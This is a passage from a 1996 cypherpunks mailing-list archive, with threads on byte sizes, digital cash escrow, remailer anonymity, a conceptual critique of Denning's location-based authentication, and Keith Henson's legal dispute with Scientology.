easy to check out the results:  Put such an IR-passing filter in front of a 
CCD-based camcorder, and take a picture of somebody.

Incidentally, this simplicity shows the flaw in using this kind of system as 
an identifier:  Since people's faces are usually visible, and can be 
photographed in the near-IR surreptitiously, it isn't clear how to prevent 
faking a face which appears to have the same IR signature and pattern.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 01:07:34 +0800
To: "Richard Martin" <rmartin@aw.sgi.com>
Subject: Re: questions about bits and bytes
Message-ID: <m0u7Ov4-000903C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:50 AM 4/11/96 -0400, Richard Martin wrote:
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Apr 10,  6:57pm, jim bell wrote:
>> At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
>> >No, bytes are no always 8 bits - some machines use(d) 9-bit bytes.
>> I notice you gave no examples.  Why is that?
>Perhaps he thought that most people who were interested could go look
>it up themselves.
>
>- From a really quick web search, we find that the SGI Impact jams 9-bit
>bytes [that's what it says] across the Rambus internally. I'm not sure
>if the memory itself is 9-bit.

Are you sure they're not referring to 8 bits of data and a parity bit?  In 
any case, please give the address to the list so that it can be checked out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 12 Apr 1996 06:34:29 +0800
To: cypherpunks@toad.com
Subject: Re: RC4 on FPGAs (Was: Bank transactions on Internet)
Message-ID: <v02120d34ad92532c84fb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:52 4/10/96, Ian Goldberg wrote:
>Coincidentaly enough, this is part of my project for my Hardware class.
>I'll let you know when I have it working.  I'm using Altera FLEX 81188s,
>though the 10K models (with built-in RAM) would be _way_ faster...

Perhaps someone with access to such a beast would donate one to this very
promising student? Seems like a good cause to me.
:-)


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Fri, 12 Apr 1996 04:23:31 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Cash Escrow
Message-ID: <2.2.32.19960411141740.00334790@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 08:11 PM 4/10/96 -0700, you wrote:
>At 10:14 PM 4/10/96, Bill Stewart wrote:
>
>>Of course, if you happen to become dead while you're storing it,
>>the paper cash is far more useful to your heirs, so I assume we'll have
>>a government-sponsored cash-escrow system announced soon to protect
>>the government's interest in collection of inheritance taxes...
>
>Don't give them ideas, Bill! They are known to monitor our list for
>insights into what to regulate next, and I can see the 15-watt lightbulbs
>going on over their heads as they ponder the wonderful opportunities
>presented by "digital cash escrow."

Sorry, but I couldn't shut up here.  Isn't this list about the free flow of
cryptographic information?  Let's not be like the government and shut down
what we talk about because we don't want certain people to know about the
technology.

Of course, your posting probably came out with tongue firmly in cheek, but
hey, censorship is still censorship (is still shit, thank you CDA.)

ObOtherListComplaint (doesn't everyone?):  Has anyone suffered ill-effects
by having their mail program filter Jim Bell's postings?  Perhaps a
10-point-rise in their IQs?  "Bytes are ALWAYS 8 bits" indeed.  Has this
child never been exposed to anything but PCs?  Go dig up the manuals for a
UNIVAC 1100, Jim.  Why do you think the RFCs for IP specifically refer to
"octets" as opposed to "bytes"?  Because (they explain) "octet" is
unambiguous, which then infers a certain ambiguity to "byte", now, doesn't it?

-j, I'll go back to lurking now for a while...
--
J. Deters
>From our _1996_Conflict_of_Interest_Statement_, re: our No Gift policy:
 "If you receive any alcoholic beverages, for example, a bottle of wine,
  you must give the gift to your location Human Resources Manager." 
This memo is from the Senior V.P. of Human Resources.
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 12 Apr 1996 07:22:58 +0800
To: cypherpunks@toad.com
Subject: liibulletin - Announcement of New Related Services (fwd)
Message-ID: <Pine.ULT.3.92.960411093629.20668B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I have no joke. I just like saying, "barratry.law.cornell.edu." Oh, and
the full-text availability of recent net.relevant decisions (numero dos)
should be useful to somebody.

So how do I get to be the Unabomber's pen pal? Hmm, what jail was he in
again? I wonder if they'll accept packages for him with excessive postage.

-rich
 and now, back to bilingual 9-bit-punks

---------- Forwarded message ----------
Date: Thu, 11 Apr 1996 12:13:36 -0400
From: "Peter W. Martin" <martin@LII.law.Cornell.EDU>
To: Multiple recipients of list <liibulletin@listserv.law.cornell.edu>
Subject: liibulletin - Announcement of New Related Services

[...]
The announcement:
================================================================
                                             April 11, 1996

Two New Services from Cornell's Legal Information Institute

I. Landmark Supreme Court Decisions

 Cornell's Legal Information Institute is pleased to announce the
addition of important "new" decisions to its Supreme Court collection.
Under a license, recently concluded with InfoSynthesis, publishers of
the USSC+ CD-ROM, the LII will be placing a steadily growing number of
historic decisions on its WWW server.  The first of these historic
decisions are now in place, including: Brown v. Board of Education (I
and II), New York Times v. Sullivan, The "Pentagon Papers" case, and
Bakke.  These join an existing collection of important decisions dealing
with privacy, the First Amendment, administrative law, patents, and
copyright.
 All decisions in this collection carry links to current U.S. Court of
Appeals decisions in which they are cited (using the LII's full-text
index of Court of Appeals decisions on the Net) and to other related
documents in the LII collection (e.g., statutes, topical summaries, the
Constitution).
 The "new" cases are accessible from the base address for Supreme Court
materials
  http://www.law.cornell.edu/supct/
or directly at
  http://www.law.cornell.edu/supct/cases/historic.htm
Additions will follow on a regular basis.

II. LII's Eye on the Courts

 Joining the current awareness services already offered by Cornell's LII
-- BigEar (http://barratry.law.cornell.edu:5123/notify/buzz.html),
liibulletin and liibulletin-ny (see
 http://www.law.cornell.edu/focus/bulletins.html) -- is a new WWW page
providing links to newsworthy decisions handed down by any of the many
appellate courts now covered on the Net, along with relevant
background, when available. LII's Eye on the Courts can be found at
  http://www.law.cornell.edu/focus/liieye.htm
================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Fri, 12 Apr 1996 21:22:32 +0800
To: jim bell <ses@tipper.oit.unc.edu>
Subject: Re: questions about bits and bytes
In-Reply-To: <m0u7BgI-00091BC@pacifier.com>
Message-ID: <9604110950.ZM8850@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Apr 10,  6:57pm, jim bell wrote:
> At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
> >No, bytes are no always 8 bits - some machines use(d) 9-bit bytes.
> I notice you gave no examples.  Why is that?
Perhaps he thought that most people who were interested could go look
it up themselves.

- From a really quick web search, we find that the SGI Impact jams 9-bit
bytes [that's what it says] across the Rambus internally. I'm not sure
if the memory itself is 9-bit.

richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMW0OIR1gtCYLvIJ1AQHvDQP/T5Xip82nGUzOO7diwoHw+BIiOXlpaEc2
oBuZ1VgMetcnr1qjANL8L5mvrMXUTJmZrDYwJ4VGSyErBX6Mm0Rz4OrMZy4mDvRt
BzEI52MXfVzItZG95AcyiSXVcjVqCn1Hbo/MO3mzrVpvROy3ibsslDks30QFDC8j
asImraxVlTE=
=bAQH
-----END PGP SIGNATURE-----

-- 
Richard Martin                                   [not speaking for a|w]
rmartin@aw.sgi.com                   http://reality.sgi.com/rmartin_aw/
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 12 Apr 1996 03:51:19 +0800
To: jsw@netscape.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <2.2.32.19960411140019.0075bfc8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 4/10/96 -0700, Jeff Weinstein wrote:

>  Given that the IETF has no "official" (whatever that means) sanction,
>what would prevent any other organization from coming in and trying to
>take over their turf?  I saw an article today (sorry, can't remember
>where) that suggested a brewing fight between IETF and W3C over future
>HTTP and HTML standards.  If someone stands up and says that the IETF 
>is becoming too slow and overcome by bickering (not my opinion, just
>a what if), and that their new group is better suited to setting standards,
>who decides who is right, and based on what criteria?  It seems that
>one aspect of anarchy is that anyone could move in and replace "their
>anarchy" with the "new anarchy".
>
>  Just some philosophical pondering late one night...
>
>	--Jeff

Why nothing.  Even your employer has done a bit of this protocol "forcing".
The actual question though is would a successor organization(s) do anything
significantly different.  The question is can a *government* order
protocols.  IBM couldn't (after a while).  If the government can't order
protocols and protocols are created by (rough) mutual consent, I'll be happy
and Dorothy won't be.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 12 Apr 1996 04:07:20 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604111412.HAA07137@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, we've pretty throughly convinced ourselves that Denning's scheme can be 
spoofed (I'm convinced, anyway.)

It's actually worse than useless - it's a substantial security breach.

     To spoof being at a location, Mallory needs to know the location he is trying to spoof.
With S/A off (as I understand it is now), he need to know the location within a couple
meters, in three dimensions.

     Such precise location data is usually difficult to obtain, without actually visiting the 
site and recording the location using GPS.  Mallory might be able to work out, for example,
the location of the desk in the Oval office to that precision by triangulation (though 
setting up theodolites on Massachusetts Avenue may attract some attention :-)
However, I defy him to find the location of a specific PC in NSA headquarters, or in a
secured communications facility  without actually visiting the desk
carrying a GPS receiver (which he won't be allowed to do, unless he's got a 
damn good reason).

     However, since the protocol requires that Alice send out location data, once
she starts using it she reveals her physical location to Eve, Mallory, and anyone ese
 who can see the packets. Since the nature of the protocol is that Alice's location does 
not  change frequently (and needs to transmitted  via a trusted channel to Bob when it
does), after the first usage Mallory  *knows* the physical location  he is trying to 
simulate, and can use this information for future spoofing.

     The upshot of this is that Denning's scheme not only provides no security against 
spoofing, and leaks potentially sensitive data about locations. 

     If Sadaam Huissain (sp?) had used this scheme during the Gulf War, we'd have been 
able to send a cruise missile directly to his keyboard.

[These flaws in the protocol seem so obvious that I can't help but wonder if we're 
missing something - Dorothy isn't *that* stupid.]

Peter Trei
trei@Process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 12 Apr 1996 04:18:54 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: Scientologists may subpoena anonymous remailer records
In-Reply-To: <Pine.BSF.3.91.960410124929.11278D-100000@kirk.edmweb.com>
Message-ID: <Pine.SUN.3.91.960411101452.21542C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Apr 1996, Steve Reid wrote:

> > I thought that most or all of the cypherpunk anonymous remailers don't
> > keep records.  Not even on backup tapes.  The whole idea is that there
> > aren't logs.  But maybe they have found some remailers that are
> 
> When a person recieves a message from someone using an anonymous 
> remailer, the return address will usually work, depending on the 
> remailer. The return address is for an address on the remailer, and 

The above is very confusing and stems, IMHO, from imprecise use of terms.
It is important to distinguish between 4 types of remailers: 

* traceable pseudonymous
* untraceable pseudonymous
* traceable anonymous
* untraceable anonymous

The text quoted above is true if it describes a "traceable pseudonymous" 
remailer, e.g.  anon.penet.fi.  This is different from, say, a cypherpunks
style remailer. 

For a full, perhaps tedious, explication of all this and other stuff too, see

http://www.law.miami.edu/~froomkin/ocean1-7.htm

an earlier, much shorter, and slightly dated, treatement of the anonymity 
issues only can be found at http://www.law.cornell.edu/jol/froomkin.htm

[...]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warmish here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Apr 1996 03:46:39 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v02120d2bad91ecd377cc@[192.0.2.1]>
Message-ID: <199604111426.KAA20759@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> There is one thing about the proposed minor flag addition to IP that I
> don't understand. [No, I am not surprised by this. Mandatory authorization
> to establish a connection and an "Internet Driver License", probably in the
> form or a smart card are coming].
> 
> If my computer creates the IP packet, what is there to prevent me from
> modifying the value of the "Minor/Adult" flag at my leisure?

Nothing prevents you from doing that, not that there is any place to
put such a flag. Moreover, it is highly unclear what the semantics are
in general, or how an application would know about them, or what you
do in tunnelling such packets, or what it means in a TCP stream if
some packets are flagged and some aren't, etc, etc. The whole thing is
a crock of shit. (Normally, I wouldn't say that but I'm trying to
violate the CDA as often as possible these days.) Its yet another case
of idiots who don't know technology pretending that technical people
are magicians who can just do anything by waving a wand, and if we say
something can't be done it must mean that we are being stubborn or
some such. Reminds me of the train disaster section of "Atlas
Shrugged". Ah, well.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@cup.portal.com
Date: Sat, 13 Apr 1996 20:30:23 +0800
To: cypherpunks@toad.com
Subject: Federal Court Friday for Henson
Message-ID: <9604111032.1.29952@cup.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


To: hkhenson
From: hkhenson
Subject: anouncement
Date: Thu, 11 Apr 96 10:31:13 PDT
Lines: 248

To those who have not been following the antics of the Scientologists 
in their epic battle with the Net, and various cryonicist, 
extropians, cypherpunks, pensfa, kabuki, and bay area folks: 

After a Temporary Restraining Order was issued against well known 
net.person Grady Ward by the Scientologists, I looked up one of the 
forbidden documents on the news spool, commented on the criminal 
aspects of the contents, and posted it to the net. 

A week later *I* was served with a 3 inch stack of legal papers.

There will be a hearing for me in Federal court, Friday, April 12,  
sometime between about 9:30 and 11:30.  It might be kind of fun, since 
I am starting by trying to get the judge to disqualify himself.

If you want to know *way* too much about this subject, the meat of the
court filings are at:

  http://www.cybercom.net/~rnewman/scientology/henson/home.html

And here is the my posting (sanitized), a threat letter, and my
response.  Sorry for the spam and the short notice. Wide distribution, 
especially to news media encouraged.  Keith Henson
**************
H. Keith Henson
San Jose, CA 95123
408-521-0614

Ronald M. Whyte, Federal Judge
Northern District of California
San Jose, CA

Open Letter to Judge Whyte

Dear Judge Whyte:

In the company of perhaps 100,000 other people (the readers of the 
Usenet newsgroups alt.religion.scientology, alt.activism, alt.2600, 
comp.org.eff.talk, and misc.legal), I read the TRO against Mr. Grady 
Ward and "all persons in active concert."  Was it your intent for this 
order to apply to random persons on the Internet such as myself?  If 
so, I believe the TRO is a violation of my First Amendment rights to 
discuss the criminal activities of the cult of Scientology. 

Upon reading the TRO you approved, I sorted the list of documents  
attached and ran a text search on the news spool on one of my accounts 
to see if any of these documents were there.  Some were-- though it is 
impossible to tell if they are the real thing or not.  I pulled out 
the first one which came up.  I had not been inclined to look at this 
material before (it's *boring*), but your TRO inspired me.  Assuming 
this is real, I can see why the "Church" of Scientology is trying to 
suppress this material.  If carried out, the instructions in this 
particular bulletin amount to *criminal* acts, to wit, the practice of 
medicine without a license.  I reproduce this widely available 
document in its entirety for your edification. 

>              HCO BULLETIN OF 14 NOVEMBER 1978

[snip all but name, I an under a TRO not to disclose the contents.]

Please note that point 4 states that this process of "blowing BTs" 
cures illness.  The phrases "cease to read" and "no longer read" refer 
to "auditing" with an E-meter.  The "Church" of Scientology is under 
Court orders stemming from FDA actions in the early 1970s against 
making such claims involving the use of E-meters.  This bulletin 
(assuming it is real) is written evidence of the level of contempt the 
"Church" of Scientology has for the Courts.  Scientology even has 
policies on using the court system to abuse critics and former 
members. 

Forbidding discussion of this particular document, including quoting
it entirely, is clearly against the public interest as well as a
violation of my First Amendment rights.  Unless, of course, copyright 
law can be used to prevent disclosure of instructions for criminal 
activity. 

With respect to "all persons in active concert,"  I have certainly 
been sympathetic to the ideals Mr. Ward espouses, and felt much of the 
rage he must have felt when (as he puts it) the "criminal cult of 
Scientology" sent Gene Ingram, a wanted felon, to obtain pictures of 
Mr. Ward's children from his mother by deceit.  For what reason did 
the "Church" of Scientology need pictures of Mr. Ward's children?  
Were they planning a kidnapping or was this just a tactic of 
intimidation?  This would certainly be an interesting question for you 
to skillfully ask of the members of the law firm which paid Mr. Ingram 
for this particular service.  They will be in your court Friday. 

I know that taking a stand against Scientology is likely to subject 
me and my family to the same abuse Mr. Ward has experienced.  But 
there comes a point where people of good will *must* stand up to 
criminals--even to those who are experts in using the courts to 
harass.  If you think I am being too harsh in this matter, I can 
supply you with nearly unlimited affidavits and court findings which 
show a consistent pattern of criminal behavior for this cult over 
decades of time.  Friday I will provide to you a letter from Mr. Arnie 
Lerma to Judge Brinkma about the stunts pulled on Mr. Lerma in a 
related case. 

Many of those who read these news groups are outside of the US, and 
thus not subject to your authority.  I, however, am local to San Jose 
and will be in your court Friday morning.  It is my position that the 
public interest in this matter should override *all commercial* 
copyright concerns.  The entire corpus of material the "Church" of 
Scientology is trying to keep from public view is so at odds with what 
cult victims are told when they are suckered into it as to constitute 
fraud--thinly disguised as "religion."  On the other hand, if you feel 
the TRO *does* preclude quoting examples of the copyrighted, trade 
secret, criminal instruction manuals of the "Church" of Scientology, 
please let me know. 

Sincerely,

H. Keith Henson
President/CEO 
Xanadu Operating Company

[CoS threat letter, and my response.  Posted on alt.religion.
scientology, comp.org.eff.talk and misc.legal]

Yo folks!  Another letter from Helena showed up in my mailbox.

[posted and mailed, cc to Judge Whyte]

>Dear Mr. Henson,
>
>     I represent Religious Technology Center ("RTC"), the owner
>of the confidential Advanced Technology of the religion of
>Scientology, and the holder of exclusive rights under the
>copyrights applicable to the Advanced Technology materials. 
>Among these copyrighted and confidential materials are the
>Advanced Technology materials of certain levels known as "NED for
>OTs Series."

Boilerplate.  Do you have a macro programmed with this introduction?

>     I have been informed that you have posted NOTs Series 34 to
>the Internet without the authorization of my client, who, of
>course, would not have given such authorization had it been
>requested.

That I did.  In particular the HCOB of Nov. 14, 1978.  I presume by 
your complaining that RTC acknowledges this material to be an official 
copyrighted, trade secret, instruction manual for criminal activities? 
No wonder you want to keep it from being discussed!   

>           I also see that you are claiming that you have talked
>to the court and that this justifies your posting.

You would have to be exceptionally dense to avoid noticing that the 
quoted document was right in the middle of a letter to Judge Whyte.

>     I am hereby placing you on notice that NOTs Series 34 is a
>copyrighted, unpublished work.

And I am hereby placing RTC on notice that the HCOB of Nov. 14, 1978 
contains claims and instructions which seem to me to be both criminal 
in nature and in violation of certain court orders against the 
"Church" of Scientology. 

>                                Not only is it subject to the TRO  
>issued by Judge Whyte against Grady Ward (and will be subject to
>the preliminary injunction once issued), it is also subject to a
>preliminary injunction issued by Judge Whyte in Religious
>Technology Center v. Netcom On-line Communications, Inc. against
>Dennis Erlich.  In both instances, the injunction is against Ward
>or Erlich and their "agents, servants, and employees, and all
>persons acting or purporting to act under his authority,
>direction or control, and all persons anyone acting in concert or
>in participation with any of them who receive notice of this
>Order."  These injunctions were issued on the basis that RTC was
>likely to succeed on the merits of its claims.

Well, lets see.  I am certainly not any kind of "agent, servant or 
employee" of either Dennis Erlich or Grady Ward, nor do I act under 
any kind of direction or control.  Now, you can go argue with Judge 
Whyte that all persons who happen to read a.r.s, agree with Grady or 
Dennis that CoS is a scam of a cult, and take independent action are 
"acting in concert or in participation."  Lots of luck. 
> 
>     You have also included in your notice a request for people 
>to send you the NOTs materials. 

I am not interested in just *any* old NOTs materials.  I asked for 
NOTs materials which amounts to instructions for criminal acts, such 
as those found in the HCOB of Nov. 14, 1978, or fraud.  I believe 
discussion of this subset(?) of these materials is in the public 
interest.  I am prepared to go to court to defend my right to quote 
from and discuss the criminal acts and policies of the "Church" of 
Scientology.  

>                                 Please be informed that the
>California Uniform Trade Secrets Act prohibits even the
>*acquisition* of materials containing trade secrets.  

I simply do not believe that anything which can be found by a few 
seconds of searching on any one of a hundred thousand computers all 
over the world can be considered a "trade secret."  What is a 
non-profit *Church* doing with trade secrets anyway?  Trade secrets 
are for *profit* making commercial companies.  Or perhaps fraudulent 
scams. 

>                                                      It is for
>this reason that Mr. Ward was enjoined under trade secret law. 
>Your solicitation of these materials is a violation of that law
>and an inducement to others to do so.

As I pointed out above, I asked for material which amount to criminal 
instruction manuals or material which shows evidence of fraud on the 
part of Scientology.  It will be very interesting to be enjoined in a 
First Amendment pursuit which is so clearly in the public interest.  
You really should try.  

You don't even have to hire a process server.  Give me a call, beeper 
# 408-521-0614, and I will come down to Mr. Hogan's office and pick up 
my papers. 

>     I am setting forth below the TRO issued by Judge Whyte and
>the notice which I posted after the TRO was issued.  I hereby
>demand that you cease and desist from any and all further
>posting, reproduction, display, distribution, solicitation or
>acquisition of NOTs Series 34 or any of the Advanced Technology
>works of the Scientology religion.  
>
>                              Sincerely,
>                              Helena K. Kobrin

Well, Helena, I am going to put it a little nicer than Grady would, 
but you can take your demand, fold it till it is all corners, and 
stick it where "the Sun don't shine."  And, just to show I mean it, I 
am *again* asking for NOTs or any other Scientology "AT" materials, 
acquired by legal, or *illegal* means which describe criminal acts, 
amount to criminal instruction manuals, or show the fraudulent bait 
and switch nature of Scientology.  It is my intent to comment on and 
post this material in the public interest.  I do not believe that 
either copyright law or trademark law will prevent the publication of 
information relating to unlawful acts.  If you think otherwise, I 
suggest you check with a couple of tobacco companies. 

>                            NOTICE TO READERS:
>
>     On March 6, 1996, Grady Ward posted a message to the
>Internet soliciting a NOTs pack.  In a later posting, Ward

[snip for bandwidth]

Keith Henson

SP 4, bucking for SP 6




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Apr 1996 05:19:41 +0800
To: Thomas Grant Edwards <tedwards@glue.umd.edu>
Subject: Re: Money supply is fake anyway
In-Reply-To: <Pine.SUN.3.91.960410202317.1705C-100000@kolo.isr.umd.edu>
Message-ID: <199604111444.KAA20811@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards writes:
> Banks "invent" money on a daily basis.

Really? Since when?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 12 Apr 1996 07:37:55 +0800
To: rmartin@aw.sgi.com (Richard Martin)
Subject: Re: questions about bits and bytes [NOISE]
In-Reply-To: <9604110950.ZM8850@glacius.alias.com>
Message-ID: <199604111452.KAA24457@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Richard Martin writes:

> On Apr 10,  6:57pm, jim bell wrote:
> > At 06:29 PM 4/10/96 -0700, Simon Spero wrote:
> > >No, bytes are no always 8 bits - some machines use(d) 9-bit bytes.
> > I notice you gave no examples.  Why is that?
> Perhaps he thought that most people who were interested could go look
> it up themselves.
> 
> - From a really quick web search, we find that the SGI Impact jams 9-bit
> bytes [that's what it says] across the Rambus internally. I'm not sure
> if the memory itself is 9-bit.

[I told myself I was going to stay out of this, but Jim Bell's dogmatic
stance irks me... ]  Here's a citation from "Portability of C Programs
and the Unix System" by S.C. Johnson and D.M. Ritchie (yes, that Richie)
in the Bell System Technical Journal volume 57, Number 6, July-August 1978.

    "A representation of characters (bytes) must be provided with at
    least 8 bits per byte. ...  Most programs make no explicit use of
    this fact, but the I/O system uses it heavily.  (This tends to rule
    out one plausible representation of characters on the DEC PDP-10,
    which is able to access 5 7-bit characters in a 36-bit word with 
    one bit left over.  Fortunately, that machine can access four 9-bit
    characters equally well.) ..."

The clear implication is that "byte" means the number of bits used or
needed to represent a single character.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 12 Apr 1996 20:26:52 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Cash Escrow
Message-ID: <199604111801.LAA12556@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:11 PM 4/10/96 -0700, Tim May wrote:
>At 10:14 PM 4/10/96, Bill Stewart wrote:
>
>>Of course, if you happen to become dead while you're storing it,
>>the paper cash is far more useful to your heirs, so I assume we'll have
>>a government-sponsored cash-escrow system announced soon to protect
>>the government's interest in collection of inheritance taxes...
>
>Don't give them ideas, Bill! They are known to monitor our list for
>insights into what to regulate next, and I can see the 15-watt lightbulbs
>going on over their heads as they ponder the wonderful opportunities
>presented by "digital cash escrow."

You're one to talk, Tim :-)  A couple years back you joked about a
"Position Escrow System", and now Dorothy's proposing the technology
to actually implement it!

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 13 Apr 1996 01:25:08 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Know Your Net.Enemies Project
Message-ID: <ad928bf30d021004097c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:47 AM 4/11/96, Declan B. McCullagh wrote:
>Would anyone be interested in collaborating on a "Know Your Net Enemies"
>project?
>
>We'd start with a resource like Bob Chatelle's excellent web pages at
><http://world.std.com/~kip/bcfenatl.html> and with permission build on
>it and list the deceptions and misrepresentations each Net-Enemy has
>engaged in -- what each has done to restrict liberty online. We'd
>include original documents and links as appropriate.
..

Sort of like Nixon's Enemies List?

Have we become the enemy?

Flippancy aside, this strikes me as being a terribly negative, destructive,
and counterproductive way of approaching things. It could easily backfire
in the media, as they note the "Enemies List," or "The Page of Shame."

Recall how the recent "List of Shame" was reacted to, as some people
clamored to be added.

And just how would "Net-Enemies" be decided upon? By vote? By acclamation?
By whomever wants to create an entry? Would Denning (Dorothy) be on the
list, but not Denning (Peter)? How about Barlow? Maybe the whole EFF power
structure at the time of the Wiretap Act should be added to the Net-Enemies
list...I'll start working on this right away.

Well, count me out. I know who I think are the people receptive to my
concerns and viewpoints, and the people not receptive...and I don't need an
Enemies List to tell me. I'd prefer to evaluate people I haven't yet
reached a decision on based on their own merits.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Apr 1996 06:22:00 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: questions about bits and bytes
In-Reply-To: <Pine.SOL.3.91.960410182824.5230D-100000@chivalry>
Message-ID: <199604111457.KAA20833@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> No, bytes are no always 8 bits - some machines use(d) 9-bit bytes. That's 
> why we have the word octet.

Indeed, machines have come in all flavors of byte size.

Byte size on PDP-6 descended machines, including the PDP-10 and
DECSystem-20, was always variable -- byte pointers could extract any
length from one bit to 36 bits, and byte size was an attribute of
files under several operating systems that ran on that series. I
remember that many of the MIT crowd favored 9 bit Extended ASCII,
using the so called space-cadet keyboards that set the two high bits
when control and meta were hit, and with the area we think of as the
control characters being taken up by other symbols.

"Byte" only came to mean "Eight Bits" consistantly in the last decade
or less. "Octet" is the only really consistant term.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Fri, 12 Apr 1996 06:33:25 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes
Message-ID: <9604111803.AA6921@>
MIME-Version: 1.0
Content-Type: text/plain


>No, Bill, a "byte" has ALWAYS been 8-bits.  

Not so.

It appears that the term "byte" originated in the IBM 360, where
it is indeed 8 bits.  And certainly all present day computers use
"byte" to refer to an octet and not to any other size.  That has not
always been true.

The CDC 6000 series used 6-bit characters, though those weren't
usually referred to as "byte".  On the other hand, on the PDP10
there were "byte instructions" which would operate on an arbitrary
piece of the (36-bit) word.  On that machine, "bytes" when used to
store characters were often 9 bits long.  That's where things like
"meta" and "alt" started, see the Hacker's Dictionary.

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Fri, 12 Apr 1996 09:32:36 +0800
To: jsw@netscape.com
Subject: Re: Bank information protected by 40-bit encryption....
In-Reply-To: <316CACF9.354D@netscape.com>
